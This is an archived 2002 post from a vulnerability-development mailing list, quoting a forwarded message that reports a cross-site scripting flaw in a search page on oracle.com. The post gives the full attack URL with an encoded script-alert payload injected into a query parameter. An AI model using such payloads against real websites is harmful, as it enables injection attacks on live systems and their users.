Vulnerability Development mailing list archives

Re: Oracle Databases Allow HTML/SQL injection


From: KF <dotslash () snosoft com>
Date: Tue, 16 Apr 2002 11:58:17 -0700

Looks like we stumbled on the same thing... Snosoft was gonna send this out with our April Fools stuff...

--- Begin Forwarded message ----

On Mon, 1 Apr 2002, l0rt wrote:
dots cross site scripting of oracle baby... ;o)  ain't he sexy.
-l0rt-

> HEH
>
> http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
>
> -KF



